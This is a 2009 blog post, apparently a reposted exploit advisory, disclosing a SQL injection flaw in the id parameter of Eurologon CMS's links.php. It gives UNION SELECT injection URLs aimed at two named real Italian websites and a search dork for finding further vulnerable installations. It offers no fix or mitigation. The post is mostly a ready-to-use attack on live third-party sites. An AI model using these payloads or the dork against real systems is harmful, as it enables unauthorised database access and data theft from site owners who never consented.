Monday, December 14, 2009

Eurologon CMS SQL Injection Vuln

6:25 AM  matthews  

Software : Eurologon Content Management System
Vendor : http://www.content-manager.it/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Vulnerable file
links.php

[o] Exploit
http://localhost/[path]/links.php?id=[SQL]

[o] Proof of concept
http://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*
http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*

[o] Dork
"Powered by Eurologon"

[o] Notes
this is a private script.

Posted in:
Twitter Delicious Facebook Digg Stumbleupon Favorites More